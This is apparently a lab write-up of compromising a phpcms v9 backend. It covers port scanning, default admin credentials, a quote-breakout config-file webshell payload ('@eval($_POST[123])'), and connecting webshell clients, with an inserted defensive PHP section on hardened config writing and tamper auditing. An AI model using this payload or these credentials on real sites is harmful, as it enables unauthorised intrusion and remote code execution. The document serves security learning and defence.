Port scan: nmap -sV -v -A 192.168.206.129
From the scan output we infer that the phpcms admin backend is admin.php and that the major version is v9.
Use Kali's searchsploit to look up known vulnerabilities in phpcms.
Try the blind SQL injection reported for version 9.0.
After testing, the target turns out not to be vulnerable to that SQL injection.
Use the admin path disclosed in robots.txt to reach the backend login page.
Then try the phpcms default credentials (phpcms / phpcms), which log in to the backend successfully.
A web search shows that the backend has a known getshell through its configuration file.
The submitted value is written straight into the \phpcms\caches\configs\system.php configuration file. The crux of this configuration-file getshell is closing the string literal: if you submit a one-line webshell as-is, it simply becomes the string value of that key, so the value has to break out of the quotes using a comma, comment characters and similar symbols. After many tests, the following payload can be written directly:
\',@eval($_POST[123]),//
After submitting, visiting the page confirms that the injected code is parsed.
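The root cause here is that the backend writes the submitted value into system.php by string concatenation, so a quote in the value terminates the string literal. The PHP below is an added example written from the defender's side, not phpcms code: render_config() shows the hardened way to serialise the file (var_export escapes every quote and backslash, so the payload above is stored as an inert string), and audit_config_file() tokenises a stored config file and flags anything that is not a bare return-array literal, which is how an incident responder can check whether this file has been tampered with. All function names, the temp-file paths and the sample contents are assumptions made for this example; a real phpcms system.php may carry a legitimate preamble that would need adding to the allow-list.

```php
<?php
// Added example (not phpcms code): hardened config writing and an audit of a
// stored config file for the quote-breakout pattern described in the walkthrough.

// Vulnerable pattern (what the walkthrough exploits): the value is concatenated
// into PHP source, so a quote in the value ends the literal and the rest is code.
//   $src .= "    '$key' => '$value',\n";

// Hardened form: var_export() serialises each key and value with backslashes and
// quotes escaped, so no value can terminate the literal whatever it contains.
function render_config(array $cfg): string
{
    $body = "";
    foreach ($cfg as $key => $value) {
        if (!preg_match('/^[a-z0-9_]+$/i', (string)$key)) {
            throw new InvalidArgumentException("invalid config key: $key");
        }
        if (!is_scalar($value) && $value !== null) {
            throw new InvalidArgumentException("non-scalar value for key: $key");
        }
        if (is_string($value) && strpos($value, "\0") !== false) {
            throw new InvalidArgumentException("NUL byte in value for key: $key");
        }
        $body .= "    " . var_export((string)$key, true)
               . " => " . var_export($value, true) . ",\n";
    }
    return "<?php\nreturn array(\n" . $body . ");\n";
}

// Audit: the file must consist solely of one `return array(...)` of literals.
// Variables, function calls, eval, comments, the '@' operator etc. are reported.
function audit_config_file(string $path): array
{
    $src = @file_get_contents($path);
    if ($src === false) {
        return ["cannot read $path"];
    }
    $allowedTokens = [T_OPEN_TAG, T_CLOSE_TAG, T_WHITESPACE, T_RETURN, T_ARRAY,
                      T_CONSTANT_ENCAPSED_STRING, T_LNUMBER, T_DNUMBER, T_DOUBLE_ARROW];
    $allowedChars  = ['(', ')', '[', ']', ',', ';', '-'];
    $literals      = ['true', 'false', 'null'];
    $findings = [];
    foreach (token_get_all($src) as $tok) {
        if (is_array($tok)) {
            [$id, $text, $line] = $tok;
            if (in_array($id, $allowedTokens, true)) {
                continue;
            }
            if ($id === T_STRING && in_array(strtolower($text), $literals, true)) {
                continue;
            }
            $findings[] = sprintf("line %d: unexpected %s %s", $line, token_name($id), json_encode($text));
        } elseif (!in_array($tok, $allowedChars, true)) {
            $findings[] = "unexpected character " . json_encode($tok);
        }
    }
    return $findings;
}

// Demo on constructed files: the walkthrough's payload stored safely as a plain
// value, and a hand-written file in the injected form a compromised backend leaves.
$safe = sys_get_temp_dir() . '/system_safe.php';
file_put_contents($safe, render_config([
    'site_name' => "\\',@eval(\$_POST[123]),//",
    'debug'     => false,
]));
var_dump(audit_config_file($safe));   // empty array: the payload is an inert string

$tampered = sys_get_temp_dir() . '/system_tampered.php';
file_put_contents($tampered, "<?php\nreturn array(\n    'site_name' => '\\\\',@eval(\$_POST[123]),//',\n);\n");
print_r(audit_config_file($tampered)); // reports '@', T_EVAL, T_VARIABLE and T_COMMENT
```

The audit deliberately fails closed: anything outside the allow-list is a finding, so a preamble that phpcms legitimately places in the file shows up on the first run and can be whitelisted once, after which any later run that is not empty is worth treating as an incident.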
When connecting with Chopper, the connection fails; AntSword also fails to connect. What's going on? The site's PHP version isn't that high, so what is the matter???
It turns out my tool was too old: some key components had been deleted by my computer's security software, so it no longer worked. I got a Cknife from a friend and connected successfully.